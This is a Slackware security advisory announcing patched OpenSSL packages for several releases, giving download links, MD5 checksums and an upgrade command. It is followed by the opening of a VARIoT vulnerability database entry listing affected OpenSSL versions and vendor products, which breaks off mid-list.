iEYEARECAAYFAlQGEj8ACgkQ4B86/C0qfVne6gCg99hMorczaPKAZbOnaQb7D4Gr /hMAoLzofSZ3Qg4e+kXrFqUAnpOjkOUK =kaPy -----END PGP SIGNATURE----- .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz 3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz 075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz 92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: df5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz 582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz b80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz 0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Slackware 14.0 packages: d1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz ec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz 25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz 4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: f2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz 4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Slackware -current packages: 49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz 27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz
Slackware x86_64 -current packages: 8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz fd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0090", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8u" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8v" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8x" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8y" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8w" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "-release-p2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "8.4-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.8" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.016" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.7" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.2-release-p11", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7530061.121.225.06100" }, { "model": "insight control server provisioning", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "7.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "7.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "jboss web server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2407863" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.4" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35007383" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78450" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "72250" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.8" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2207906" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.14" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "hp-ux b.11.23 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v2)" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "-release/alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.00" }, { "model": "9.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "linerate", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "2.3.2" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78350" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "9.1--releng", "scope": null, "trust": 